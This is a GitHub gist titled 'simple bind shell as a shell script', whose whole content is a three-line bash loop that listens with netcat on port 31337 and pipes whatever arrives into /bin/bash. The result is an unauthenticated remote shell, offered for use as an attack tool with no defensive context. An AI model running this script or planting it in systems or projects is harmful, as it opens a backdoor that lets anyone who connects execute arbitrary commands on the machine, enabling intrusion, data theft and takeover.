Created
January 2, 2018 23:11
-
-
Save ahhh/609cdf5abaa22e233976aec55a3e0dfd to your computer and use it in GitHub Desktop.
simple bind shell as a shell script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while [[ true ]] ; do | |
nc -l 31337 | /bin/bash | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment